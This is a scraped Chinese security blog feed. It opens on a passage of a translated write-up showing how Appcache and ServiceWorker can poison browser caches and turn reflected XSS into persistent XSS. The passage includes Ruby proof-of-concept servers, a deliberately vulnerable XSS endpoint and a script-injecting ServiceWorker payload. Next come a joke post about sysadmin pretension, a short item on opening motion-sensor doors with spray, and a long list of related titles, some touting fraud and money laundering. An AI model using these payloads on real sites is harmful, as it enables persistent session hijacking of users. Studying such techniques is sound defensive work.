/blog/2015/06/04/mongo_ruby_regexp.html /blog/2015/05/08/pusher.html /blog/2015/03/04/hybrid_api_auth.html /blog/2015/03/27/slack_or_reset_token_hashing.html /blog/2015/07/18/2fa.html /blog/2015/05/21/starbucks.html /blog/2015/03/05/RECONNECT.html /blog/2014/01/01/puzzle1.html /blog/2015/04/10/email_password_manager.html /blog/2015/02/28/openuri.html /blog/2015/06/25/puzzle2.html /blog/2015/01/22/peatio-audit.html /blog/2015/01/10/hacking-bitcoin-exchanger.html /triple} # 替换响应内容 pages.each{|page| get page, &wire } # 响应/a.appcache get '/a.appcache' do response.headers['cache-control'] = 'max-age=3155760000' response.headers['content-type'] = 'text/cache-manifest; charset=UTF-8' "CACHE MANIFEST /a.appcache #{pages.join("\n")} " end 127.0.0.1 sakurity.com 打开任意一个缓存后链接,显示从cache取 还有因为在 manifest 中需要指定缓存文件,所以尽可能多的收集URL才能让user agent cache多一些。比如可以利用google site关键字,site:victim.com 作者给出的通过google来收集url的ruby代码 require 'open-uri' f=open('https://www.google.ru/search?q=site%3Asakurity.com&oq=site%3Asakurity.com&aqs=chrome..69i57j69i58.2444j0j9&sourceid=chrome&es_sm=91&ie=UTF-8').read def get_pages(domain) f=open('https://www.google.ru/search?q=site%3A'+domain+'&oq=site%3Asakurity.com&aqs=chrome..69i57j69i58.2444j0j9&sourceid=chrome&es_sm=91&ie=UTF-8&start=10&num=100&').read r = f.scan /http:\/\/#{domain}(.*?)[&%]/im puts r.flatten.uniq.join(' ') end get_pages 'sakurity.com' ServiceWorker 介绍: Service Worker,我们可以用它来进行本地缓存,相当于一个本地的proxy。说起缓存,我们会想起我们常用的一些缓存技术来缓存我们的静态资源,但是老的方式是不支持调试的,灵活性不高。使用Service Worker来进行缓存,我们可以用javascript代码来拦截浏览器的http请求,并设置缓存的文件,直接返回,不经过web服务器,然后,做更多你想做的事情。 如果我们使用了Service Worker做缓存,浏览器http请求会先经过Service Worker,通过url mapping去匹配,如果匹配到了,则使用缓存数据,如果匹配失败,则继续执行你指定的动作。一般情况下,匹配失败则让页面显示“网页无法打开”。 上面是Service Worker的基本使用场景,当然,不仅仅局限于数据缓存。 详细可参考 初识ServiceWorker 影响范围:Chrome on desktop and only over https: websites 但危害比Appcache更大,但范围有限。 利用 ServiceWorker ,我们不需要为每一个页面都设置缓存,它能够拦截所有请求,修改响应。能够通过一个worker来控制整个domain js代码 onfetch=function(e){ e.respondWith(new Response('<script>alert(document.domain)</script>',{headers: {'Content-Type':'text/html'}})) } content-type:text/javascript # Try to get persistent XSS on https://clientsit.herokuapp.com/ # 1. The user loads the /xss link you crafted # 2. The user closes the tab and opens any other page # 3. The user sees an alert. # PS. not ruby specific. For Chrome. get '/jsonp' do response.headers['content-type'] = 'text/javascript' "#{params[:callback]}(0)" end get '/xss' do response.headers['x-xss-protection'] = '0;' "<html><body>Hello, #{params[:user]}</body></html>" end 演示地址 昨天试了下,还是可以执行的,今天就被Chrome XSS Auditor拦了 可以说 XSS + JSONP + ServiceWorker = Permanent XSS on every page 总结 Appcache 修复起来非常困难,因为缓存是在客户端。它可以被作为完美长期的 cache poisoning tool。当我们访问的服务器被控制或不安全的连接(中间人攻击)会受到该攻击影响 ServiceWorker是一项新兴技术,实现时需要考虑很多问题,比如和JSONP一起使用的情况。让任意响应为 text/javascript 成为一个ServiceWorker是非常糟糕的主意。至少可以添加额外的响应头 Service-Worker:true 或 准确的指明 Content-Type:text/javascript-serviceworker 来加以限制 [原文地址] 各种吐槽: 1# hkAssassin | 2015-08-20 15:28 不错 2# 海盗湾V | 2015-08-20 19:37 赞一个。。 3# 小饼仔 | 2015-08-21 15:03 @海盗湾V @hkAssassin 感觉如果利用起来,危害不小,可以试试 4# insight-labs (Root Yourself in Success) | 2015-08-21 16:25 除非手动访问 chrome://appcache-internals/ 删除,缓存就会一直存在。即使是网站已经修复了漏洞,插入了恶意代码的本地文件依然在浏览器的缓存中,一直影响用户,造成持久的session hijacking 和 XSS 很实用的技术啊 5# hkAssassin | 2015-08-21 17:25 @小饼仔 是的。危害不小 6# 小饼仔 | 2015-08-21 18:27 @insight-labs 修复方式是让用户自己手动删除,确实不实际 7# 超蓝 (换个马甲好好做人,请叫我暧昧) | 2015-08-21 20:51 6666 够猥琐 8# debug | 2015-08-24 09:14 思路不错 manifest 文件需要配置正确的 MIME-type,即 "text/cache-manifest"。必须在 web 服务器上进行配置。 9# 爱捣蛋的鬼 | 2015-08-24 14:29 除非手动访问 chrome://appcache-internals/ 删除,缓存就会一直存在。即使是网站已经修复了漏洞,插入了恶意代码的本地文件依然在浏览器的缓存中,一直影响用户,造成持久的session hijacking 和 XSS 。。都知道这个恶意代码了, 如果修改了话, 那肯定会更改版本号了,让缓存失效~ 10# 爱上平顶山 (IT民工 职业搬砖 挖坑 丝一枚 神马都不会~) | 2015-08-24 14:59 刁刁的 11# 小饼仔 | 2015-08-24 15:02 @爱捣蛋的鬼 正常来说manifest如果没有被缓存,服务器端如果更新了,本地缓存也会修改。如果把manifest本身也加到缓存列表中,浏览器就不会去服务端拿manifest文件了。 12# 爱捣蛋的鬼 | 2015-08-24 17:30 @小饼仔 了解了,这个屌,我忘记了这个缓存描述文件,本身自己被缓存了~~~

2015/8/31
articleCard.readMore

系统运维工程师装逼完全指南

1、全球化的认证有助于提升逼格,什么OCM、CCIE、RHCA、CISSP等等能考都考,再不济,也要有一张系统架构设计师或者网络规划设计师的信产部认证。每过一个认证,逼格提升一档。 2、TCP/IP协议、Linux内核深入研究、ORACLE大全等等之类的超过1千页大本头的书能有效提升B格,一定要放手边。不懂不要紧,别人能看见就行了。真有人跟你谈这些,也别担心装B失败,谈网络就从TCP的实现谈起,谈Linux就从内存的管理谈起,谈数据库就从各数据库SQL语句的源码实现谈起。如果有人跟你谈MS的东西也不要紧,就说自己之前有多年的微软的工作经历,外包的也算。反正也不会有查。有人非要跟你谈硬件,最次也要从计算机部件分类谈起吧。 3、大众化的东西要少用。能用ATS,就别用squid;能用postgresql,就别用MySQL;坚信什么nginx、lighty这种webserver要比apache好一万倍,而且apache能实现的功能,这些都能实现,不行就自己写模块、写扩展。实在要用apache,也别用高版本,抱死1.3的系统。有人要是问起,就说这是基于1.3的版是自己深度二次开发版本。实在要找不到的话也不要紧,没事在sf、oschina上看看什么下载量少的项目,背背项目简介啥的。不得不说,这两个网站太贴心,分类都给你做好了。总之,小众的东西能很有效的提升你的装逼级别。 4、写脚本的话,别用grep、sort 、uniq、管道这类命令。使用纯粹的awk、sed的实现,长度不要紧,阅读性、性能也不是问题。功能实现了,别人都还不懂这就是关键。如果真有人来请教,也要装出一副很简单的表情。切记不要摇头尾巴晃。就算是你是从《sed和awk》这种书上抄你自己也不一定能看懂的代码。 5、虽然会shell,但也要少用shell。初级装逼者,系统管理会首选perl、python、php这类3p的工具,而且要对shell这种语言有一种不屑。把什么性能、移植性、面向对象要常挂嘴边。如果还能再写几行什么erlang、ruby、lua这类语言做系统管理,绝对是装B神器,也是中级装逼的标准。高级装逼者会有Haskell这类函数式语言进行系统管理,这绝对是装B的B2轰炸机呀。当然,资深装逼者会返璞归真,使用面向对象进行shell编程。对,你没看错,是使用OO进行shell编程。 6、当谈到Redhat、ubuntu这类大众发行版本时,就回复一个字“切!”LFS、Gentoo这类系统绝对是装逼的首选。不为什么,就为在无穷尽的编译中找到属于自己的快感。如果非装大众发行版,也要从开机画面、登陆提示等等地方打自己上深刻的烙印。装逼的寂寞岂是一般人能懂的。 7、对什么checkpoint,juniper等表示不屑。必须天天把iptabes的链和表都挂在嘴边,尤其是mangle表。原则上对商用产品的一律不屑一顾,什么f5,radware一律自己开发实现。至于意外的将自己关在外面的事情一定要严格遵守各自公司的保密协议。 8、对于操作终端呢,像SecureCRT、xshell这种绝对是不用的,一定要用最原始的,什么黑屏绿字只是初级装逼者的水平,中高级则是Alpha半透明终端,桌面背景在设置个全球internet流量趋势图。让你根本就不知道他天天对着屏幕在敲什么东西。有事没事编译一些大型软件,看着翻滚的屏幕做思考状。 9、名片的title一定要是系统架构师,没有名片也不要紧,什么QQ签名、人人状态、微博简介上,有人看的地方一定要写上。这些都是提升B格的好地方。 10、初级装逼谈流量、PV、自动化;中级装逼谈流程、谈规范,什么ITIL、ITSM要常挂嘴边;高级装逼谈架构、谈模式;资深装逼则谈合同、谈成本。 11、混圈子对装逼来非常有必要的。什么XX沙龙、XX架构师大会、XX优化大会之类必要是常客,露个B脸就行。基本原则就是跟搞系统谈网络,跟搞网络的谈数据库,跟搞数据库的谈安全……对方不懂什么就谈什么对就了 12、最后,骨灰级早就超出三界外,不在五行中,他们注定有着传奇的色彩。他们正忙于对装逼者们进行职业发展规划。装逼助理、初级装逼、高级装逼、资深装逼、装逼总监直至CBO。如果发展了到了CBO,那么你一定是一位惊天地、泣鬼神的一代B神,一统江湖的教主,供万千iBer敬仰。darling,我很看好你哟! 留言评论(旧系统): 佚名 @ 2015-08-31 17:59:22 至今有1年了,LFS(linux From Scratch)还是菜,上面的其实不是装b,只是一个进化的方向罢了(然而被你们这群混蛋用来装b) 本站回复: -_-!!! 西兰花 @ 2015-09-07 08:39:25 混圈子对装逼来非常有必要的。什么XX沙龙、XX架构师大会、XX优化大会之类必要是常客,露个B脸就行。【这B脸露的。。。。】 本站回复: -_-!!! 佚名 @ 2015-09-20 21:26:06 +深度好闻 本站回复: -_-!!! 狼狼恶狗 @ 2015-09-23 09:09:33 大哥,我想装逼。求领进门 本站回复: 真不收~ -_-!!! 佚名 @ 2015-09-29 17:44:35 打开lcx.cc本来就是为了装个B~~ -_- 本站回复: -_-!!! 佚名 @ 2015-09-30 09:22:13 装B软文 本站回复: -_-!!! 装的一首好b @ 2015-12-12 17:11:37 如题 本站回复: -_-!!! 佚名 @ 2016-01-27 13:00:58 受教了。。。就往这个比格上发展。。。 本站回复: -_-!!!

2015/8/31
articleCard.readMore

物理黑客:使用空气清新剂喷雾触发传感器来打开“安全”门!

视频: 借用空气清新剂从外部打开基于PIR Motion Sensor的“安全”门 用喷雾触发传感器来打开“安全”门 只能说samy实在是太机智了。。 再附上两篇有趣的议题,是大黑客samy在这次的defcon上讲的。 一个是借助signal jammer,来猥琐的“bypass” rolling code。内容和spencer whyte的Analysis of RF Remote Security Using Software Defined Radio里讲的如何应对rolling code部分很相似。不过samy 多走了许多步,让attack显得更加犀利。其实我觉得在关门的时候jam掉信号然后用你喜欢的姿势播放一下关门时会出来的那个声音也挺有意思的。嘛,不知道有多少人会在关门的时候看着车按钥匙。。 http://samy.pl/defcon2015/2015-defcon.pdf 另外一个是通过OpenSesame Attack来缩短针对fixed code的爆破时间。 http://samy.pl/opensesame/ 相关内容: 北京NDS公司工程师攻击46万台机顶盒传播反动信息 获刑12年 GSM Sniffer WEB 界面搭建测试 反黑逆向溯源追踪之:某某某局入侵事件分析 号称不会被查水表的通信APP-Telegram,悬赏20万美元求漏洞 社会工程学:一张SIM卡引发的连锁社工人肉案例 讨论:如何在网络上保护个人隐私?互联网时代的隐私泄露与安全保护? JS绕过代理、VPN获取真实IP及内网IP,逆向追踪 简单获取CDN背后网站的真实IP,CDN逆向,反向跟踪网站真实IP MD5散列密码不等于MD5的安全性 [翻译]Python开发中的密码散列(Hashing) wifi环境下获取对方手机号码的可能性 JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪 三种方法还原ASP.NET可逆加密内容 WiFi流量劫持:网站JS脚本缓存投毒!长期控制!浏览任意页面即可中毒! 讨论:关于手机话费套现的问题,手机的电话费如何套现? 社会工程学追踪 妻子花6万挖出小三 给60多个号充话费锁定4人 逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件 警察说:电话诈骗中,骗子存在哪些漏洞 渗透道哥的黑板报里那个骗子网站,入侵电话诈骗的骗子网站 同事亲历的一次电话诈骗 【警惕】一个神秘电话,工商银行卡内余额不翼而飞!网银诈骗! 论黑产黑阔如何安全地转移赃款/洗钱? 论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统 跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费? Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本 现实生活中的社工:批量搞同学校里妹子QQ、手机等信息,伪装老师套学生信息 伪装快递打电话社工地址,我这样用手机社目标住址大家觉得可行吗? 移动"4G"卡所带来的威胁,随便补办别人手机卡?4G换卡补办别人手机号? 如果躲开支付宝风险监控,何才能做到不违反支付宝风控条件呢? 对小米论坛泄露数据的一次分析 密码成功破解率高达37.8% 讨论:因为这次小米信息泄漏事件,总结一下数据泄漏造成的危害 python加密通讯后门 网络匿迹、逆向追踪:关于那些做H站的人,是怎么落网的? 中航信系统漏洞泄露乘客信息,查询任意航班乘机人姓名,航班号,身份证,手机号 移动电源内置窃听器,在淘宝上买的充电宝内置远程定位、监听硬件后门! APT攻击:境外间谍“飞哥”假扮女网友策反境内人员 窃取中国军事秘密 采集指定域名邮箱用于社工或者fuzz的PHP小脚本 基于行为特征识别的网络诈骗嫌疑人追踪系统 社工算是一种技术吗?社会工程学讨论…… 逆向追踪,反向爆菊:在服务器上发现了挖矿程序,求爆菊姿势 Angry Birds和广告系统泄露个人信息——FireEye对Angry Birds的分析 2014 最新 web qq 密码的加密方式分析过程,WebQQ 登陆密码加密算法分析 小米手机客户资料泄露了吗?冒充小米售后回访诈骗电话:01053799231 【愚人节分享】一个钓鱼方法【测试几分钟有成功案例】 使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全 黑客讲故事:攻下隔壁女生路由器后,我都做了些什么,无线路由器被蹭网后,入侵女神 女黑客Oona,分析直升机现场拍摄警车追捕画面中的信号声,绘出飞机飞行轨迹 多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己 基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线? 发个社工福利站,搜库 - 密码泄露查询,社工库,泄露密码查询库 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息 支付宝存漏洞 嫌犯伪造执照盗刷网店20余万 京东惨招恶意炒作,数据库泄露为撞库攻击 DedeCMS 注入漏洞批量入侵爆菊 Exp 进入了路由器怎么让她进入我的钓鱼网页? 已知IP能定位到多么具体的地理位置?市级? 一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱 如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪? 江西男子克隆国外银行卡刷513万 给两任女友395万 跨境盗刷信用卡 支付宝/淘宝帐号无需密码登录任意帐号,随意查看用户资料/交易记录/转账洗钱 个人认为微信支付存在的安全问题,同一银行卡多重绑定,恶意盗刷 关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己 浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉 【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工 探秘国际职业黑客:插U盘植入木马如同拍电影,做得上班族扮得007,社工大师 求助加密代码解密!!!比较另类的“加密”一句话木马后门…… 俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据 保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹 XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录 黑阔大牛来说一说切实可行的匿名上网方法 2000万条酒店开房数据泄露 男子婚事被搅黄 探秘时刻:多重身份的逃犯,不翼而飞的七百万,几百买身份证一票弄了700万 由“正方”jiam、jiemi之逆向思及Base64之逆编码表 定位系统那些事儿 利用声学密码分析攻击破译4096位RSA加密算法 针对工行诈骗黑产团伙的调查回忆录 开房数据泄露案告破 警方发现嫌犯曾参与多起网络犯罪 再论黑卡,黑吃黑,银行黑卡,超级网银签约直接转账 Liftoh木马钓鱼邮件正在进行时 物理攻击?那些年我们忽略掉的一些社会工程学手段 娱乐贴:看我如何逃避追查以及洗钱 我是这么设计高性能海量数(ku)据(zi)查询系统的(一) 看到有同学在问支付宝快捷支付漏洞--转一篇科普文章 记一次 三打哈网 社工获取到服务器 全方位在互联网中保护自己第八章(如何留住数据的节操(上)) 探秘短信马产业链-从逆向到爆菊 探秘伪基站产业链 您的工商银行电子密码器将于次日失效?伪基站垃圾短信,网银钓鱼诈骗! 搞到另外一个妹子运动会的照片,求眼尖的看看是哪所学校 讨论一下,怎么才能社工到岛国AV女优的真实资料,例如:泷泽萝拉 谷歌云端硬盘在天朝是否真的安全? 朋友点开一个文件给骗30万,一种“高级”QQ诈骗骗术,远控电脑诈骗 关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料? 【巨狗血!】奇葩的比特币钓鱼案例!!!!!! 抛砖引玉,扒扒伪基站那些事 社工思路讨论:如何根据蛛丝马迹来找到具体的人或者物? 伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙! 【讨论】伪基站、圈地短信设备是怎么做出来的? 偷取一个人的钱包,还能让他告诉我信用卡的提款密码 ? 技术讨论:关于盗取支付宝讨论 【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘! 遇到一个加密方式 只有1和0 求大神告知,二进制字符串“加密” 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范) 社工某黑阔大牛的域名,“脑残”客服,狗血 +10086!!! GSM Hackeing 之 SMS Sniffer 学习 京东 淘宝 天猫订单信息泄露诈骗, 接到“京东”的客服电话之后遭遇团伙诈骗 为什么所有的无线频率都是2.4GHz? 金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币 动画科普:银行与货币系统真相,动画揭露货币系统真相 如何发现系统中的异常,交易系统异常行为监控机制讨论 [技术分析]利用波士顿马拉松爆炸案热点的新型APT攻击 了解你的对手:追踪快速响应的APT攻击 【讨论】今天偶遇淘宝另类“骗钱”技巧 社工个人电脑到内网渗透系列 如何通过域账户来定位域机器 淘宝一星期【骗】20万的可行性过程分析 服务器流量异常追踪--抵抗AWVS扫描 【略狗血】一种结合本地程序的更加猥琐的钓鱼方式(中招率+100%) 阴谋论:政府通过手机基站的电子精神控制 adobe 1.5亿泄露数据 密码算法逆向挑战 逆向追踪之:通过QQ群里的图片逆向入侵,拿了几个phpddos的脚本 一个反制钓鱼邮件的思路 从丝绸之路到安全运维与风险控制 上集 CDN流量放大攻击思路 讨论下快捷支付存在的风险 讨论下快捷支付存在的风险 娱乐贴:打击网络诈骗 - 骗子骗钱反被骗 - 发个骗子的手法,其实还是时时彩 全方位在互联网中保护自己第六章(国产软件或后门软件的替代品(下)) 逆向追踪:查找360wifi(知道ssid)的使用者 Windows下的无线热点蜜罐 全方位在互联网中保护自己第三章(知识普及篇—了解网监的实力与暗箭(下) 全方位在互联网中保护自己第一章(知识概念篇第一部分) 各位黑括小心cmd5泄漏自己 简单分析丝绸之路创始人如何被抓,FBI真的能透过TOR获取真实IP么? 全方位在互联网中保护自己第五章(国产软件或后门软件的替代品(中)) 全方位在互联网中保护自己第四章(国产软件或后门软件的替代品(上)) 全方位在互联网中保护自己第二章(知识普及篇第二章-了解网监的实力与暗箭(上)) QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截 求黑产大牛目测,一位妹纸的亲身经历,身份证号+手机号洗你银行卡 如何用意念获取附近美女的手机号码,伪装免费CMCC信号,钓鱼妹子手机号码 怪异!10086短信接口泄露?10086发博彩、赌博短信 银行卡里钱莫名其妙被转走了,有身份证号码、姓名、银行卡号就能提款? 在申诉中猜想QQ密码可能明文储存,讨论腾讯申诉“历史密码”机制 注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪 浅谈怎样保住数据最后的贞操 移动自助终端未授权访问-通杀丽江 现在傻逼太多,骗人太好骗,淘宝搜剑灵激活码,好多10几块钱的骗子 如何看两个ip是不是在一个机房,路由追踪 猜想:利用GFW使中国对外网络瘫痪??? 逆向追踪之:网站被挂淘客跳转以后发生的事情 病患信息遭泄露 骗子假扮医生短信要红包 猜想_利用终端查询机日内网 免费购物 会员卡加钱??? “联通3G无限 流量卡”淘宝上这种无限流量的卡可信度有多少? 【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗? “伪基站”任意冒用手机号短信诈骗 别对我撒谎 让支付简单一点 如何保护自己之防非IP方式追查,黑钱提线,赃物收货。。。。 为抓小偷 俄警方在地铁安装能读取乘客手机信息的设备,这是啥技术? 一次蜜罐社工套0day! 山西破获首起“伪基站”案件 逆向爆菊、反向追踪之:追查史上最奇葩的“挂马”黑客! 物理设备安全大牛 Barnaby Jack 挂了... 保护自己之手机定位信息收集 一个诈骗类的技术性问题,朋友的! 技术讨论: 楼宇广告终端 怎么破? 入侵户外广告大屏幕! 请教关于手机IMEI定位的问题 安全跑路指南2013之乌云版【连载中】 一种巨猥琐的挂马方法、超淫荡的APT攻击思路:如果这么挂马会不会挂进内网 女士回电信诈骗电话 几秒钟时间100元话费没了 (视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing 腾讯泄露隐私?看卫士哥获得女神的好友的名单,社工可能认识的人! 发两个qq钓鱼站点 求测试 - 乌云白帽子 XSS 实例 刚刚看到个鱼站,然后就被轮流爆菊了…… 如何设置安全的密码 小型APT之看我如何入侵电视,我是如何入侵智能电视的 全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞 应用安全思维系列之一:如何保护密码才安全 一张随意拍摄的波士顿马拉松比赛照片,如何帮助FBI破案 我们是如何通过一张照片定位到疯狗位置的 分享下自己使用的保护方法篇章二(虚拟机模板环境设置) 连载中... 针对莱特币的新木马被发现 Carberp源代码泄露后续——黑掉黑客 黑市交易 – 女性肉鸡价格比男性贵100倍 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置)连载中... 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置) 连载中... 使用电视棒接收飞机信号 简单的实现方法 超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她 微信聊天都是你好友吗?“诈骗”之“微信社工学” 【姊妹花】淘宝一敬业诈骗【50和我谈了一个小时】 R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B) rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪 雇黑客攻陷招生网站改成绩 3骗子做发财梦进看守所 淘宝钓鱼诈骗,如今淘宝各个分支产业对网民不利的分支缺陷 公布一个非常高端的淘宝店铺骗局方法 黑客改造脑波耳机,让您可以通过思想控制建筑物 针对性攻击与移动安全漏洞 视频: Dtac:将宠物变成了WiFi热点,泰国运营商将宠物变成WiFi热点 户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机) 视频: 可以用手势控制的Wi-Fi:WiSee 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件! WIFI信号可用于识别身体姿势 再次遭遇 GoTop 挂机刷钱“病毒”,逆向爆菊,追踪背后“牧马人” 公共无线安全——FakeAP之WiFi钓鱼 DNS域传送信息泄露 GNU Radio USRP OpenBTS 小区短信 区域短信 一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截 【传奇】看职业骗子如何揭发谷歌广告服务的不法活动,谷歌5亿美元和解费 如何抵御社工库类的黑客攻击?在明文密码已泄露的情况下保护自己? 钓鱼之XSIO漏洞,一个非常猥琐的“漏洞” 54dns劫持实现dns钓鱼攻击威胁? 监听空中的无线电,监听polices对讲机 0x80c IRC 网络安全匿名聊天室 百度搜索页面劫持脚本,百度搜索来路页面跳转劫持,骗点击 上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼! 支付宝木马爆菊过程总结帖【附源码】 接上一章节,支付宝木马,后续情节【2】 高级钓鱼攻击来了:针对拍拍的XSS攻击 接上一章节,支付宝木马,后续情节 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 周末湖边 Sniffing ADS-B,Hack 私人小型机场 一种猥琐方式的对攻击者定位(观315有感) 关机后仍能提取出内存中的关键信息,计算机关闭后内存数据泄露 国外发现中国针对美国无人机厂商的APT攻击 中国是全球最大的的APT攻击来源 揭秘诈骗千万人民币的团伙及具体位置分析 淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店 核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程! 如何用Android智能手机劫持一架飞机(PPT下载) 公安部督办QQ红钻诈骗案破获 腾讯损失3000余万 中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人 接着核总的《打击钓鱼,人人有责》之后的故事... 打击钓鱼,人人有责…… 研究人员首次发现用于针对性攻击的Android木马 V,背后的故事 + 网友细致分析讨论 + 核总终极点评 【跟风贴】XSS挖出一个黑产团体 XSS挖出一个黑产团体 《XSS挖出一个黑产团体》 山寨广告非法医疗搜索引擎路在何方,医疗 = 巨型诈骗军团! 物理黑客户外硬件入侵之:某咖啡厅的广告展示终端…… 陌陌猥琐流定位妹纸精准位置 有图有真相 + 安卓工具 [终端安全] 一种猥琐的通用绕过某些终端系统沙盒方法 追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理! 服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码 公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析 [讨论]如何入侵一个户外的电子显示屏 探索网络出口GFW的强度与翻墙 二维码应用漏洞|欺骗|....更多好玩的??? [fixed]中国移动139邮箱之前的一个重置密码流程漏洞 耍了一个发给我网购木马的骗子~~ Base64 格式的密文,Base64 方式的 MD5 密匙,一些编码知识 几种常见的hash加密,怎么判断hash的类型 Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入 农行网银体验机,自助终端权限绕过方法 android 延迟锁定bug,安卓手机锁破解,屏幕解锁保护 android软件外加监控,隐私安全?!爆个一键root内幕! 关于手机的隐私保护。。 关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论 支付宝的设计问题 401钓鱼新玩法,反向401钓鱼 远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击 国外黑客团队,现在的定向攻击模式,高级渗透、社工,游戏托端 骗子卖家利用淘宝交易漏洞骗流量 追踪PlugX Rat作者,人肉定向攻击远控PlugX开发者 中斯警方联合行动抓获百名电信诈骗案嫌疑人 dSploit—Android网络渗透套件测试小记(含视频) 实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump) FBI备忘录显示黑客成功入侵了商业HVAC工控系统 android 手机系统、平台渗透测试神器 dSploit 看新闻学知识之手机千里追回 西安丢iPhone定位在北京民警辗转2400公里追回 来福士等试点室内定位技术 定位GFW的python脚本,如何找到GFW设备的IP地址 电话诈骗手段升级 听按键音破译银行密码 路由器里的终端设备名带来的安全问题 银行等保之网银体验机安全测试 由社工妹子引发的C段沦陷,由社工妹子的引发的内网渗透一条龙 如果大量短信攻击会不会造成拒绝服务,导致手机接不进电话? 钓鱼网站诱骗支付占据网络不安全事件首位 微博“兼职”被骗3000 上网“报警”又被骗1300 武汉公安开发尖端人像识别系统 可瞬间辨认嫌疑人 全国摄像头寻人 终端机常见绕过沙盘方法、突破终端机屏幕锁定限制方法大全 东京大学加密招生海报解密过程(内含妹子) “钓鱼”网站横行:运营商与搜索引擎成帮凶 发现APT攻击的破绽 可能的拦截HTTPS加密通信的手段 破解Google Gmail的https新思路 Android 无视屏幕解锁保护界面 - 安卓手机锁破解 试验无线网络监听 网络账户密码也可被获取 一个40位的“md5” 网曝银行卡密码“漏洞” 王鹏你妹“占领”北京地铁五号线屏幕,关于“王鹏你妹”的真相 北京地铁5号线所有电视屏显示“王鹏你妹”官方回应 谷歌获智能手表专利:原理似谷歌眼镜(图) 网上团购月饼支付变游戏点卡 钓鱼网站借此牟利 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 法国政府约谈Facebook称泄漏用户个人隐私 十一黄金周 钓鱼网站常以优惠做诈骗噱头 解密搜狗搜集用户信息的用途 Flightradar24 网站“直播”天上“堵飞机” 看全球实时航班 《魔兽世界》截屏数据水印惊现用户私人数据 截图隐藏水印 暗含玩家信息 某些搜索引擎超科幻搜索结果,泄露了不只一点点 简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例 街机、捕鱼机、上分器、解码器、打码器、写码器、无线、遥控 美国试点超级无线网络 覆盖范围达数公里 如何从按键音中听出360总裁周鸿祎的手机号码 + 详细剖析 iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器 Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗 iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号 男子淘宝购物10秒后接“卖家”电话 被骗7000元 找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置 视频:Sight 未来视网膜成像技术 科幻微电影 黑客攻击导致澳安全情报局网站,崩溃长达半小时 德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机 非法获取百度推广账号 实施网络诈骗 篡改百度推广 市民被骗财 黑客在Defcon建立私人电话网络 - DEFCON 忍者 GSM 网络 支付宝错发中奖短信 送236台iPad2 网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 讲述一个关于高考的“黑客”故事:用2B铅笔“注入”阅卷系统 视频:如何动手改造iPhone添加无线充电功能 善用网站权限设置 莫让社交变“裸奔” 社交网络诱人沉迷 病态的自恋 6000万网民一年被骗300多亿元 奇虎360成功加入GFW防火长城 为国家安全保驾护航 瑞典研发新技术可让WiFi每秒传输2.5TB数据 